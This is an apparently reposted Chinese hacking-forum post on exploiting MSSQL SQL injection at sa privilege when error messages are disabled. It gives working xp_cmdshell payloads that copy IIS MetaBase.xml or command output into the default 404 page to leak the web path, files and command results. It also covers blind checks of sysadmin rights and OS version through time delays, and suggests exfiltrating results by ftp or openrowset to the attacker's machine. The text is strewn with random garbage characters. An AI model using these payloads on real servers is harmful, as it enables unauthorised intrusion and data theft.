遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
' u. Y/ K5 c, x, A M
" N/ s! [( ?" u$ W8 D 虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。& R9 z# F: w) w3 g7 b0 S- s
3 A. i6 H! P- J6 F! P
这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。, K8 O' X) N1 A( g+ A$ }9 x/ z0 `
. ^% ^# L% v/ u4 x8 s9 |: {# u IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm8 I2 o: T- J5 M' |4 T
/ G1 A, y/ t& s3 |8 `" u7 L 得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--
8 l: A( F) S2 f f& k$ |
0 f4 |8 r7 M; { k7 {+ p# h ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。' d q( Q, V: E# c1 e) n- _
( H* b0 ?5 |# _" w. `+ L+ _' p: v9 m
执行命令得到回显+ o4 ?( O2 J2 K% r) I& A" f: P
4 N9 w! {( F4 \ 通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--/ i& E; _& N. ~4 G% f
8 j- \$ r Q4 t7 b2 v) A
得到文件也shi相同,把文件copy到404b.htm就行了7 b4 n7 x Q+ R
5 l' x* M) _: \! I' M, I9 F; }
by 28ice, 2008/6/26
& A' F& p0 Q& F$ E8 h. t) i% `: ]- }# c8 H
摘自 28度的冰
, D2 }8 ]. q5 D% J; `; x" V- X/ T4 \# W! R! ~
盲注判断权限和操作系统版本# B5 S8 A4 R! W6 h
( G" n! s) Y; }1 j" Z4 m) U 首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?# H- z9 ^& M4 { C1 o, K* c3 h& p
, y/ G" A5 b) K8 } 最简单的,可能以用这样的方法:. R5 ^9 Z4 j" q3 u
7 G3 L1 u4 r+ U7 [( r 1=(select IS_SRVROLEMEMBER(’sysadmin’))/ o6 l- N0 y* n! s( U
' z: Q4 r5 B0 Q$ e. m% } 当然,有些情况下,这个方法并不奏效。' D& E' F* S k& P
, @* P: \8 K; t$ u
既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
0 r; |! ~( F, R, k
+ x) s8 M' X( M+ o 有个3办法可能以解决这个问题) P; @3 J& `% v0 N- g5 O4 i
1 x1 y0 }: T8 ~ i
a.把执行结果写到404b.htm,具体请看我的上一篇文章
' g2 ?) O1 h, ?) ]* k6 H
" H9 e# ]5 a) V: Z3 u, H/ @ b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟& a$ M' x+ Z/ a7 J! g- |' z: Y
" Q" D4 x% \; X/ ? c.如果1433端口可能以连接,那干脆新建个sql登录; p& ?% ^8 _# P# u- _. a5 a, C- Z+ u
& [0 L' O4 w3 c% j+ j; G% v
d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数 t" D' b4 a+ s) f
! \% F1 r, k4 F
还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
0 w b& i2 v- e" ?- `) n0 d
0 Z9 m* `4 ?" [% w4 Q 很简单
# n* i4 H7 Z4 _- q% A% p$ s1 t/ Q1 U+ J8 k' `* K8 H9 V
执行systeminfo
+ ]3 ~- j) k; N9 o
( o) S1 k3 r. j! P, B 在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。 |
发表于 2012-9-15 14:15:42
收藏
支持
反对